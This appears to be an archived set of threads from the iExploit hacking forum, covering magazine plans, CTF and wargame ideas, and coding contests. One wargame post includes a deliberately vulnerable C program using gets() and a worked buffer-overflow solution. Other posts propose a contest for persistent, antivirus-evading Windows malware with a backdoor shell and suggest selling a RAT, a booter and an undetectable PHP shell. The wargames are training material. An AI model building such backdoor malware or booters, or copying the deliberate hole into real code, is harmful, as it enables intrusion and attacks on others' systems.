Competitions / Projects - iExploit

Back again, with a video! :)

D0WNGRADE — Mon, 15 Apr 2013 16:48:22 -0400

Hey there, it's been awhile everyone! :D

I'm back yet again, to be completely honest I forgot about iE... :(
Anyways, I made a ROM Development video for Android and I'm planning on making more so be on the lookout!

Any got a solution for this programming challenge ?

mandi — Tue, 22 Jan 2013 10:55:39 -0500

hi guys,
here is challenge i got from my friend,i just want to know there is a solution available for this task,

when i enter a number it should display it's equivalent binary number like for 2 = 0010 3=0011,
but the important restriction is "IT SHOULD NOT USE/INVOKE MULTIPLICATION OR DIVISION OF ANY FORM" inside the computer.

is there a solution possible ?

if any one has one please post here...

Are people still interested in doing a magazine?

Xin — Thu, 04 Aug 2011 15:12:24 -0400

On security/programming/activism/ ?

Custom Android Kernel (Guide?)

D0WNGRADE — Sun, 01 May 2011 01:51:23 -0400

[align=center]Hello iExploit![/align]
I have recently been doing some ROM development along with my Android application development. I am working on a custom kernel and if it works out in the end, would any of you be interested in seeing a video of how it all works? Thanks!
~D0WNGRADE

Issue 0x01 Cover | Contents

Xin — Tue, 07 Jun 2011 19:59:58 -0400

http://k.min.us/jddYMw.png

Tell me what you think of the cover its not perfect i know ;p For the contents im going to do a spread on...

- Anonymous's new operation
- Sonys history of hacks
- Lulzsec new movement and hacks
- Backtrack 5 vs Blackbuntu
- Cybersecurity challenge
- More which i havent though of yet
- Article on informants
If you guys could produce some pages in MS Word format, or if not just .txt and i will format it for you :)

I had an idea!

m0rph — Fri, 25 Jan 2013 04:52:19 -0500

So check it out. I've been attacking metasploitable and de-ice machines lately to keep my skills up to date for whenever I try for OSCP again. As I was going through them, I had an epic idea. Would anyone be interested in trying to solve downloadable virtual machines as haxme's? There are a couple of bonuses to this idea:

Pros:

[+]Would generate a lot of interest for new users
[+]It would help people practice in a multitude of ways w/o having to break the law
[+]It's extremely unique
[+]Boost knowledge
[+]People could collaborate to create a challenge
[+]Anyone could try to solve a challenge at any time
[+]Anyone could create a challenge
[+]Extremely easy to create/package/download
[+]Saves Xin money from paying for another server for similar types of challenges
[+]Limitless possibilities with what kind of challenge one would want to make
[+]Since the challenges would be virtual machines, there's no risk of getting pwned by someone else 
or the challenge becoming corrupted while attempting to do it

Downside:

[-]Could potentially raise monthly data usage (if you don't have a monthly data cap then this point 
doesn't matter)
[-]Would need a little time/patience to setup
[-]Need to be comfortable using virtualization software like vmware/virtualbox
[-]You might require a computer capable of handling virtualization software

What do you guys think?

hack.lu

Sh3llc0d3 — Fri, 19 Oct 2012 19:34:10 -0400

Just out of curiosity is anyone taking part in hack.lu ctf?

http://2012.hack.lu/index.php/Main_Page

Best Desktop Competition 50% Off Elite!

Xin — Wed, 15 Sep 2010 17:22:09 -0400

I am creating a competition for the best desktop!
Both me and George will choose the winner, staff can enter but obviously wont win as they can already access elite

Rules
- Must contain the words "iExploit.org" and your username ( to prove its yours)
- Can be any OS and use any widgets,
- Desktop background cant be anything offensive.

Let the desktops roll in. Good luck everyone

Price 50% off Elite
So its 5$ instead of 10$

Project Propostion: X-SploitServ OS (Name not finalised)

Xin — Mon, 06 Jun 2011 16:56:33 -0400

This is not another Pentest OS before you rage.

This is aimed to be a no GUI server based operating system comprised of tools that can be launched via SSH. It will be a lightweight distro based on a stripped down Debian Squeeze.

We will then build it back up again with server-based penetration testing tools and group collaboration tools. There will also be a variety of command line tools that can be launched via SSH.

Advantages of this
- Tools like Nessus Server will not waste your resources running on your own computer, you can simply use its nice web interface
- Collaboration is key in this project, tools like dradis can be used for easy web based collaberation
- Old computers can not run the latest backtrack with ease
- You do not need to conduct your Pentests in a vm anymore or have a brilliant PC dedicated to backtrack only, you can launch all from the web or from SSH using minimal resources
- If it is a group server, your IP is totally masked in attacks!
- A great and unique community project to get started! :D

Proposed Tool list (Please start contributing)
Web Based tools
- Nessus server
- Dradis Server
- Msf web

Other tools
- Metasploit with rpm server on (ie you can connect clients like arminatage)
- nmap, can be launched via a web script we make or via ssh.
- Most of the CLI tools that are in backtrack

Project Suggestions

IRPAS/VIPRR
LOKI!!!!
NCAT
NCRACK
IKE-SCAN
UNICORNSCAN
SCANRAND

Further Development
- We could also create a web script that allows us to control all the CLI scripts via a nice web interface.
Please give your comments! :)

Wargame - Simple

chroniccommand — Tue, 29 Mar 2011 03:50:33 -0400

So here is a simple wargame I've whipped up in C. The idea is the user has to call a function that isnt called in the program. The way this is accomplished is with a buffer overflow. Here is the source of the wargame:


#include <stdlib.h>
#include <stdio.h>

NoCall()
{
    printf(\"Password: 93x#L\n\");
    exit(0);
}

EvilInput()
{
  char evilbuffer[8];
  printf(\"Insert text: \");
  gets(evilbuffer);
  puts(evilbuffer);
}

main()
{
  EvilInput();
  return 0;
}

So the idea is we just give the compiled binary but not the source. We give the user a hint that the function they must call is NoCall()

So here is a sample solution:


[chronic@vandal tmp]$ ./wargame
Insert text: AAAAAAAAAAAAA
AAAAAAAAAAAAA
Segmentation fault
[chronic@vandal tmp]$ gdb wargame
GNU gdb (GDB) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"
and \"show warranty\" for details.
This GDB was configured as \"i686-pc-linux-gnu\".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /tmp/wargame...(no debugging symbols found)...done.
(gdb) list
No symbol table is loaded.  Use the \"file\" command.
(gdb) disas NoCall
Dump of assembler code for function NoCall:
   0x08048434 <+0>:     push   %ebp
   0x08048435 <+1>:     mov    %esp,%ebp
   0x08048437 <+3>:     sub    $0x4,%esp
   0x0804843a <+6>:     mov    $0x8048550,%eax
   0x0804843f <+11>:    mov    %eax,(%esp)                                                    
   0x08048442 <+14>:    call   0x8048350 <printf@plt>                                         
   0x08048447 <+19>:    movl   $0x0,(%esp)                                                    
   0x0804844e <+26>:    call   0x8048370 <exit@plt>                                           
End of assembler dump.                                                                        
(gdb) q                                                                                       
[chronic@vandal tmp]$ printf \"AAAAAAAAAAAA\x34\x84\x04\x08\" | ./wargame
Insert text: AAAAAAAAAAAA4ï¿½
Password: 93x#L
[chronic@vandal tmp]$

Now printing the password to stdout isnt exactly the best solution. So I was thinking we could maybe use execve to execute a program like /bin/iexploit that displays the password.

iMag?

Corrosion — Tue, 15 Mar 2011 14:39:20 -0400

I have been thinking about publishing a magazine for quite some time, although this takes a decent team to pull off....

The fact is most magazines in print today do not have anything really worth while in them... Maxpc for example recycles their crap..

Wouldn't it be great to have a magazine that did some urban exploration, linux tutorials, the latest in open source news, etc?

I really want a printed magazine that can cater to that, we have enough talent around to do it and I think we should try..

I was going to do DeAuthThis : Magazine but my team is we'll........... lets just say not exploit inclined, so I think working with iExploit would suit better...

http://www.magcloud.com/

can print the magazines at a good price of $0.20 per page, and the seller can add to costs to get some cash out of it, but its not really for the money anyway...

Coding Competition [Finished]

Sh3llc0d3 — Wed, 27 Apr 2011 09:54:57 -0400

[align=center]Elite Programmer's & Noobs Welcome[/align]

There will be two categories in this competition, for more experienced coder's (we know who you are :P) we are looking for two applications /person, one for noobs. The closing date is in two weeks time.

Elite Coders
Brief:
The application will perform backups from servers. It will be required to transfer a file I specify (input into the program) to a remote host securely. You will design and make the client and server side (so socket programming is a must know). Client being on a host needing constant backup and server receiving the backed up file.

[host] ------------------------> [remote host]
 Client                            Server
file to be backed up ----------> remote location

Compatibility:
Linux. x86 or x86_64. To ensure your chances I'd stick with 32bit programming on this one.

More Info:
Extra points will be handed out for practicality, security and ease of use. I'm looking for ingenuity and being able to follow a brief. The security should not hinder the ease of use.

Noob Coders
The aim of this is to discover new coding talent. Any type of program is accepted. Obviously nothing against the rules though. Make sure it's you own work as we'll be checking. Your not gaining anything by lying.

Compatibility:
Windows XP x86 [32bit] or linux [x86 // x86_64]

Winners:
Winners will be entered into their own user-group and get a special myAward. Other prizes are TBA.

This thread is for submissions and questions only anything unrelated will be deleted.

Elite Submissions
Chroniccommand
s1n4

Noob Submissions
L0g0nb3rry

Printed Copy | Mockup Cover

Corrosion — Fri, 03 Jun 2011 06:51:43 -0400

I think we need to step up the magazine, make it better.
Full color copies, we could have them printed at low cost and aside from that we can send out free/cheap pdf files...

Below is a mock up I did as an example of a cover, I'm not artist but I believe it will lead to something good.

NOTE: The gliph tag goes to deauththis.com its just as an example is all and was created before I was added to this group.

http://deauththis.com/pdf/Exploited%20M ... 0Cover.pdf

Sqli Site

Sh3llc0d3 — Tue, 19 Apr 2011 16:52:44 -0400

I've borrowed the code from elsewhere and altered for our needs... but I think we should think about getting something off the ground soon.

Site is below:

SQL db just needs importing, and login details changed in "header.php" if I remember rightly.

I think this, and another similar site with different vuln points in the site, maybe RFI/LFI for the other team. Plus some SSH/software exploitation challenges would be a good start for a CTF. Challenge to deface or get db or something or win automatically by getting root.

Different SSH Wargames

Xin — Sat, 22 Jan 2011 21:17:30 -0500

Like STS have IO.sts, blowfish.sts etc
and intruded have narnia, leviathan etc

I think we should have things like

chronic.ie
xin.ie

And basically have our own wargame mission sets, to give more variation, i think that would be pretty cool, but to do this, would you need to have more than 1 SSH Server?

Fund Raising [Site Dev]

Sh3llc0d3 — Sun, 10 Apr 2011 21:08:15 -0400

Suggestions for fund raising

I know everyone hates skiddies applications but it's money at the end of the day and people will pay if we do a good enough job.
[list]
[*]iExploit RAT[/*:m]
[*]iEBooter[/*:m]
[*]Hacking Lessons[/*:m]
[*]FUD PHP Shell[/*:m][/list:u]

Just getting the ball rolling guys but we need something to kick things into gear and I think we could do it pretty easily with the coders we have around here. Any money left over can be shared out and encourage people to get involved :)

iExploit Official Malware Competition #1

Xin — Wed, 23 Feb 2011 19:35:46 -0500

Hey Guys this is the first of a number of iExploit Competitions.

Briefing
Rather than create a whole piece of malware/virus for this competition you will be focusing on only one part, persistance.

The aim of this competition will be to make the most persistant piece of malware, the winner will be who's malware is the hardest to remove when ran in our virtual box.

To make it a bit harder, you must be able to connect to the infected computer and get a shell, which will also be tested by us. This should make it harder to get this past the AV/firewall.

The box will be a Windows XP SP2. So focus your binaries on Windows.

Useful Links
- http://en.wikipedia.org/wiki/Metamorphic_code
- http://en.wikipedia.org/wiki/Polymorphic_code

Competition Close Date
- The competition will close April 1 2011 for evaluation
- We will announce the winners shortly after.

Rules/Guidelines
- Must provide a .exe that will run on the system.
- No additional programs can be used with your virus to improve it, such as worms/crypters etc
- Must provide full source code
- Must link to iExploit in source code
- Prizes to be confirmed
- Must spawn a shell as a backdoor
- Points will be awarded for the origionality and complexity of your malware
- Points will be awarded for commented code
- Points will be awarded for good coding techniques and clean code

Tips

- Helps if it can survive reboot
- Helps if its FUD

Prizes
1st. Not decided yet
2nd. Not decided yet

All malware in the top 3 will have a video made to shown the malware in action and put on the youtube channel and website.

Choose Our Motto (Under the logo)

Xin — Mon, 20 Sep 2010 22:20:55 -0400

Give me all your ideas, and the best most original motto will win :)

Another wargame

chroniccommand — Sun, 27 Mar 2011 16:54:32 -0400

So I just whipped up another wargame in ASM. All the user has to do is open the wargame in gdb and examine the memory address of the variable "Password"

Here is the source of wargame.s:


# Wargame for iExploit
# Coded by Chroniccommand

.data
	Password:
		.ascii \"welikeasm\"

	OneByte:
		.byte 15
	Message:
		.ascii \"This is not the password....\"

.text
	.globl _start

	_start:
		movl $1, %eax
		movl $0, %ebx
		int $0x80

To compile:


as -o wargame.o wargame.s

Then link it:


ld -o wargame wargame.o

Solution:


[chronic@vandal tmp]$ gdb -q wargame
Reading symbols from /tmp/wargame...(no debugging symbols found)...done.
(gdb) info variables
All defined variables:

Non-debugging symbols:
0x08049080  Password
0x08049089  OneByte
0x0804908a  Message
(gdb) x/12cb 0x08049080
0x8049080 <Password>:   119 'w' 101 'e' 108 'l' 105 'i' 101 'e' 107 'k' 97 'a'  115 's'
0x8049088 <Password+8>: 109 'm' 15 '\017'       84 'T'  104 'h'
(gdb) q